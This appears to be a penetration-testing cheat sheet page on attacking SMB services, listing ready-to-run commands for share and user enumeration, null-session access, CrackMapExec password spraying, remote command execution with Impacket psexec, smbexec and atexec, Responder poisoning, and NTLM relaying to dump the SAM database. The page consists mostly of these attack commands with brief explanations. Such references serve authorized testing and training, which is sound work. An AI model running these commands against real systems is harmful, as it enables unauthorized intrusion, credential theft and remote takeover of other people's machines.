π¦SMB
Enumeration
sudo nmap IP -sV -sC -p139,445
Anonymous Authentication
smbclient -N -L //IP
-L
List shares-N
Uses null session
smbmap -H IP
smbmap -H IP -r SHARENAME
smbmap -H IP --download "notes\note.txt"
smbmap -H IP --upload"notes\test.txt"
RPC Remote Procedure Call
rpcclient -U'%' IP
> enumdomusers
./enum4linux-ng.py 10.10.11.45 -A -C
Password Attacks
CME Password Spraying
We use --local-auth
if targeting a non-domain joined computer
crackmapexec smb IP -u userlist.txt -p 'password!' --local-auth
--continue-on-success
flag will continue spraying even after a valid password is found.
RCE - Remote Code Execution
Using PsExec we can execute processes on remote systems along with full interactive console application all without the need to install any software manually
Impacket PsExec
impacket-psexec administrator:'password!'@IP
impacket-smbexec administrator:'password!'@IP
impacket-atexec administrator:'password!'@IP
CME Command Execution
crackmapexec smb 10.10.110.17 -u Administrator -p 'password' -x 'whoami' --exec-method smbexec
-x
Run a command-X
Run PowerShell commands
CME Enumerating Users Logged In
crackmapexec smb 10.10.110.17 -u Administrator -p 'password' --loggedon-users
Forced Authentication
responder -I <interface name>
Impacket-ntlmrelayx
## /etc/responder/Responder.conf
SMB = Off
Dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t IP
Latest Vulnerabilities
SMBGhost
Last updated
Was this helpful?